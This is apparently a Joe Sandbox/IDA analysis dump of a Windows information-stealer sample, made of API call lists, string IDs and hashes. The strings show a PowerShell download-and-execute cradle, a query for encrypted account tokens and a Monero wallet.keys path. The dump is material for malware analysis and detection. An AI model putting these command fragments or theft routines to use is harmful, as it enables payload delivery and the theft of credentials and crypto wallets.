                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                      • lstrlen.KERNEL32(00000000), ref: 0052BC9F
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0052BCCD
                                      • lstrlen.KERNEL32(00000000), ref: 0052BDA5
                                      • lstrlen.KERNEL32(00000000), ref: 0052BDB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: d04a81964b8e8fa5c32cbf6bba4b08fb8766445612352990e05b66c57fae048a
                                      • Instruction ID: f27b427bd7c3753687e87b8711dbbd5486318a50e08730d617fd8aa8a5738f5b
                                      • Opcode Fuzzy Hash: d04a81964b8e8fa5c32cbf6bba4b08fb8766445612352990e05b66c57fae048a
                                      • Instruction Fuzzy Hash: A0B13272910109ABDB04FBA0DD9AEEEBB38BF94300F404558F547B6091EF746E49CB66
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: 5c7b14e57d63d5a90ddfd7ba3ba0bfbc439ea7b0a620366c82393dd9184f152d
                                      • Instruction ID: ca1af41fbbe35d903fd58c573f2004a416a168b1a45f76aeffb2f4e453df5ba4
                                      • Opcode Fuzzy Hash: 5c7b14e57d63d5a90ddfd7ba3ba0bfbc439ea7b0a620366c82393dd9184f152d
                                      • Instruction Fuzzy Hash: 56F05E3090430AFFD3449FE0E90972C7B70FB04703F088198E60AA6290D6B84B419F9A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00524FCA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00524FD1
                                      • InternetOpenA.WININET(00540DDF,00000000,00000000,00000000,00000000), ref: 00524FEA
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00525011
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00525041
                                      • InternetCloseHandle.WININET(?), ref: 005250B9
                                      • InternetCloseHandle.WININET(?), ref: 005250C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: 539b5c5204dab33661268d178bfac167bca2ee2424dc1a7ddf04e57271d167b1
                                      • Instruction ID: 36f847a477e24e842ade6f5319b0eba70b2fc07a21d148fa085cae3ee3a1c1dc
                                      • Opcode Fuzzy Hash: 539b5c5204dab33661268d178bfac167bca2ee2424dc1a7ddf04e57271d167b1
                                      • Instruction Fuzzy Hash: C031EBB4A00218ABDB20CF54DC89BDDB7B4FB48704F5081D9E60AB7281D7B46A858F99
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00538426
                                      • wsprintfA.USER32 ref: 00538459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0053847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0053848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00538499
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                      • RegQueryValueExA.ADVAPI32(00000000,00F1E200,00000000,000F003F,?,00000400), ref: 005384EC
                                      • lstrlen.KERNEL32(?), ref: 00538501
                                      • RegQueryValueExA.ADVAPI32(00000000,00F1E458,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00540B34), ref: 00538599
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00538608
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0053861A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 82b52549a7c7b60c2f17558fcde4d78be32d443e3c707a73d904f234dc287075
                                      • Instruction ID: 858ecd55003abdd5abe0fd140faf7e36b372b282867361de524d04e731f11ba5
                                      • Opcode Fuzzy Hash: 82b52549a7c7b60c2f17558fcde4d78be32d443e3c707a73d904f234dc287075
                                      • Instruction Fuzzy Hash: 7221E9B1910218ABDB24DF54DC85FE9B7B8FB88704F00C5D8E60AA6180DF75AA85CFD4
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005376A4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 005376AB
                                      • RegOpenKeyExA.ADVAPI32(80000002,00F0BE88,00000000,00020119,00000000), ref: 005376DD
                                      • RegQueryValueExA.ADVAPI32(00000000,00F1E308,00000000,00000000,?,000000FF), ref: 005376FE
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00537708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: e8244cb356235325f84e2ad29ce25e3cecb6dfa34cc961c404af390bb3b81309
                                      • Instruction ID: b424a2e32be85e05935a758186aef0ce71ff8756421b9ddde032dcd442b5a9d3
                                      • Opcode Fuzzy Hash: e8244cb356235325f84e2ad29ce25e3cecb6dfa34cc961c404af390bb3b81309
                                      • Instruction Fuzzy Hash: F20162B5A04309BBDB10DBE4DD49FADBBB8EB48701F108454FA06E7291E6B89900CF55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537734
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0053773B
                                      • RegOpenKeyExA.ADVAPI32(80000002,00F0BE88,00000000,00020119,005376B9), ref: 0053775B
                                      • RegQueryValueExA.ADVAPI32(005376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0053777A
                                      • RegCloseKey.ADVAPI32(005376B9), ref: 00537784
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: b49f8f19f39d06d5270fa68ccb923950efb747e499f6c562790e5295301e8829
                                      • Instruction ID: 10adab060765213026400a613178a6949b5a4fbc19240f0c1969a5a703478e43
                                      • Opcode Fuzzy Hash: b49f8f19f39d06d5270fa68ccb923950efb747e499f6c562790e5295301e8829
                                      • Instruction Fuzzy Hash: 1F0117B5A40309BBDB10DFE4DC4AFAEB7B8FB48705F108555FA06B7281D6B469008F55
                                      APIs
                                      • CreateFileA.KERNEL32(:S,80000000,00000003,00000000,00000003,00000080,00000000,?,00533AEE,?), ref: 005392FC
                                      • GetFileSizeEx.KERNEL32(000000FF,:S), ref: 00539319
                                      • CloseHandle.KERNEL32(000000FF), ref: 00539327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID: :S$:S
                                      • API String ID: 1378416451-1984518138
                                      • Opcode ID: e3da8dea96df9764e10d520508190f8b8172e91d01ee48ec97a72d96ca44e81c
                                      • Instruction ID: 7b3111305f227f90573a43054e00242234df0b0dc19f0a4fb591813bcecbcbff
                                      • Opcode Fuzzy Hash: e3da8dea96df9764e10d520508190f8b8172e91d01ee48ec97a72d96ca44e81c
                                      • Instruction Fuzzy Hash: 25F03CB5E44308BBDB10DBB4DC49B9E7BB9FB48710F10CA54F652A72C0D6B496018F45
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                      • ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                      • LocalFree.KERNEL32(0052148F), ref: 00529A90
                                      • CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: e0b5e1fac2b861129e7abe8a037fb76c978f58321743746ce1ea4fd5b871c3fb
                                      • Instruction ID: cea5e1b8ad5f5f1ca015e30f82c0196c534ca68ae8d43a1ec27ac8c4c38d3abb
                                      • Opcode Fuzzy Hash: e0b5e1fac2b861129e7abe8a037fb76c978f58321743746ce1ea4fd5b871c3fb
                                      • Instruction Fuzzy Hash: 9931F6B4A0030AEFDB14CF94D985BAE7BB5FF49340F108158E912A7390D779AA41CFA1
                                      APIs
                                      • lstrcat.KERNEL32(?,00F1E620), ref: 005347DB
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534801
                                      • lstrcat.KERNEL32(?,?), ref: 00534820
                                      • lstrcat.KERNEL32(?,?), ref: 00534834
                                      • lstrcat.KERNEL32(?,00F0BA18), ref: 00534847
                                      • lstrcat.KERNEL32(?,?), ref: 0053485B
                                      • lstrcat.KERNEL32(?,00F1DD00), ref: 0053486F
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 00538D90: GetFileAttributesA.KERNEL32(00000000,?,00521B54,?,?,0054564C,?,?,00540E1F), ref: 00538D9F
                                        • Part of subcall function 00534570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00534580
                                        • Part of subcall function 00534570: RtlAllocateHeap.NTDLL(00000000), ref: 00534587
                                        • Part of subcall function 00534570: wsprintfA.USER32 ref: 005345A6
                                        • Part of subcall function 00534570: FindFirstFileA.KERNEL32(?,?), ref: 005345BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00532D85
                                      Strings
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00532D04
                                      • ')", xrefs: 00532CB3
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00532CC4
                                      • <, xrefs: 00532D39
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00529F41
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$AllocLocal
                                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                      • API String ID: 4171519190-1096346117
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,00F1DA60,00000000,00020119,?), ref: 005340F4
                                      • RegQueryValueExA.ADVAPI32(?,00F1E4A0,00000000,00000000,00000000,000000FF), ref: 00534118
                                      • RegCloseKey.ADVAPI32(?), ref: 00534122
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534147
                                      • lstrcat.KERNEL32(?,00F1E4B8), ref: 0053415B
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 690832082-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537E37
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00537E3E
                                      • RegOpenKeyExA.ADVAPI32(80000002,00F0C3C8,00000000,00020119,?), ref: 00537E5E
                                      • RegQueryValueExA.ADVAPI32(?,00F1DC20,00000000,00000000,000000FF,000000FF), ref: 00537E7F
                                      • RegCloseKey.ADVAPI32(?), ref: 00537E92
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      APIs
                                      • StrStrA.SHLWAPI(00F1E1E8,?,?,?,0053140C,?,00F1E1E8,00000000), ref: 0053926C
                                      • lstrcpyn.KERNEL32(0076AB88,00F1E1E8,00F1E1E8,?,0053140C,?,00F1E1E8), ref: 00539290
                                      • lstrlen.KERNEL32(?,?,0053140C,?,00F1E1E8), ref: 005392A7
                                      • wsprintfA.USER32 ref: 005392C7
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005212B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 005212BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005212D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005212F5
                                      • RegCloseKey.ADVAPI32(?), ref: 005212FF
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      APIs
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Type
                                      • String ID:
                                      • API String ID: 2109742289-3916222277
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00536663
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00536726
                                      • ExitProcess.KERNEL32 ref: 00536755
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 5ac6609f9eb577b97e9871431edcd233640032efe043aa7419e59daed6e0a618
                                      • Instruction ID: 2232346fb0ba784c9f1fd22354aeca958608c1d9dd7010b79502bb82b35cd285
                                      • Opcode Fuzzy Hash: 5ac6609f9eb577b97e9871431edcd233640032efe043aa7419e59daed6e0a618
                                      • Instruction Fuzzy Hash: 1431FDB2801219ABDB14EB50DC95BDDBB78BF84300F404199F21676191DF746B49CF5A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00540E28,00000000,?), ref: 0053882F
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00538836
                                      • wsprintfA.USER32 ref: 00538850
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: 35e2df741408b1b9c08ffcddffd7a15bd6b82e5cc57fed77700b22d7d64d72df
                                      • Instruction ID: ea5c4a739bf11966088240ef6c1fa1e570c635b48be208971d3ae7b63ebb0740
                                      • Opcode Fuzzy Hash: 35e2df741408b1b9c08ffcddffd7a15bd6b82e5cc57fed77700b22d7d64d72df
                                      • Instruction Fuzzy Hash: F821EDB1A44305BBDB04DF94DD49FAEBBB8FB48711F108519F606B7280C7B9A9018FA5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0053951E,00000000), ref: 00538D5B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00538D62
                                      • wsprintfW.USER32 ref: 00538D78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 749d64902cc15b33d1cce9999030c3d147ffe29928d74553caba88a92c661e6c
                                      • Instruction ID: 832361584e0c7a2d6d5567a747f8b68eaa714a4e0068015f5602cf813d25d1d2
                                      • Opcode Fuzzy Hash: 749d64902cc15b33d1cce9999030c3d147ffe29928d74553caba88a92c661e6c
                                      • Instruction Fuzzy Hash: ACE0E675A50309BFD710DB94DD09E5977B8EB44702F104154FD0B97280D9B56E109F56
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0052A2E1
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 0052A3FF
                                      • lstrlen.KERNEL32(00000000), ref: 0052A6BC
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                      • DeleteFileA.KERNEL32(00000000), ref: 0052A743
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
